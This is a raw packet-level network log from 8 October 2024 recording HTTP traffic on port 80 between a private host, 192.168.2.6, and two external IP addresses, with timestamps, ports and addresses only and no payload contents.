Oct 8, 2024 11:31:05.361238003 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361291885 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361340046 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361351013 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361407995 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361443043 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361476898 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361509085 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361509085 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361530066 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361582994 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361615896 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361650944 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361684084 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361685991 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361685991 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361745119 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361833096 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361867905 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361886024 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361921072 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361938000 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361958981 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.361984968 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.361995935 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362030029 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362071991 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362081051 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362118959 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362127066 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362169027 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362220049 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362226963 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362262964 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362297058 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362323046 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362346888 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362397909 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362432957 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362466097 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362473011 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362473011 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362523079 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362576962 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362618923 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362627983 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362673044 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362679005 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362715006 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362750053 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362803936 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362855911 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362879038 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362879038 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.362890005 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362924099 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362957001 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.362983942 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363008022 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363008976 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363061905 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363096952 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363130093 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363173008 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363178968 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363178968 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363225937 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363260984 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363286018 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363295078 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363328934 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363332987 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363365889 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363425016 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363434076 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363467932 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363518953 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363553047 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363563061 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363585949 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363620043 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363620996 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363656044 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363688946 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363694906 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363723040 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363755941 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363770008 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363790035 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363822937 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363847017 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363857031 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363890886 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363922119 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363925934 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363957882 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.363960028 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.363993883 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364029884 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364065886 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364082098 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364082098 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364099979 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364159107 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364192009 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364228964 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364229918 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364229918 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364263058 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364296913 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364330053 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364363909 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364397049 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364407063 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364407063 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364432096 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364465952 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364500046 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364532948 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364567041 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364602089 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364617109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364617109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364617109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364638090 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364670992 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364691019 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364705086 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364738941 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364759922 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364772081 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364789963 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364805937 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364840031 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364871979 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364881039 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364906073 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364944935 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364978075 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.364996910 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.364996910 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365015984 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365048885 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365081072 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365113020 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365145922 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365150928 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365150928 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365180969 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365216017 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365250111 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365253925 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365284920 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365289927 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365322113 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365355015 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365387917 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365389109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365389109 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365421057 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365454912 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365488052 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365497112 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365524054 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365566969 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:05.365605116 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.365638971 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:05.406030893 CEST	80	49992	34.205.242.146	192.168.2.6
Oct 8, 2024 11:31:05.406050920 CEST	80	49992	34.205.242.146	192.168.2.6
Oct 8, 2024 11:31:05.406161070 CEST	49992	80	192.168.2.6	34.205.242.146
Oct 8, 2024 11:31:05.406249046 CEST	49992	80	192.168.2.6	34.205.242.146
Oct 8, 2024 11:31:05.411113977 CEST	80	49992	34.205.242.146	192.168.2.6
Oct 8, 2024 11:31:06.485805035 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485836983 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485850096 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485862017 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485872984 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485882998 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485893965 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485892057 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.485908985 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485919952 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485928059 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.485932112 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485944033 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485946894 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.485955000 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485965967 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485976934 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485977888 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.485986948 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.485997915 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486004114 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486010075 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486018896 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486022949 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486035109 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486042976 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486051083 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486062050 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486073971 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486083984 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486090899 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486093998 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486099958 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486109972 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486109972 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486124992 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486135006 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486145973 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486148119 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486156940 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486169100 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486175060 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486180067 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486190081 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486200094 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486202002 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486212969 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486223936 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486224890 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486237049 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486247063 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486251116 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486258030 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486272097 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486290932 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486291885 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486336946 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486336946 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486373901 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486407995 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486424923 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486440897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486474991 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486485004 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486507893 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486541033 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486550093 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486577034 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486609936 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486625910 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486644030 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486676931 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486695051 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486709118 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486742973 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486759901 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486776114 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486810923 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486829042 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486845016 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486881018 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486907959 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486910105 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486943960 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.486963987 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.486978054 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487013102 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487029076 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487045050 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487076998 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487093925 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487109900 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487153053 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487185955 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487241030 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487273932 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487286091 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487308025 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487341881 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487356901 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487375975 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487426996 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487445116 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487478018 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487510920 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487525940 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487545967 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487579107 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487596989 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487615108 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487647057 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487675905 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487684965 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487718105 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487732887 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487751007 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487783909 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487795115 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487817049 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487849951 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487859964 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487885952 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487919092 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487936974 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.487951994 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487987041 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.487997055 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488020897 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488053083 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488069057 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488085985 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488121986 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488136053 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488156080 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488189936 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488207102 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488224030 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488257885 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488272905 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488291979 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488323927 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488341093 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488359928 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488394022 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488409996 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488429070 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488461971 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488481045 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488497019 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488529921 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488545895 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488564014 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488596916 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488615036 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488631010 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488663912 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488678932 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488698006 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488732100 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488746881 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488765001 CEST	80	49991	63.250.38.167	192.168.2.6
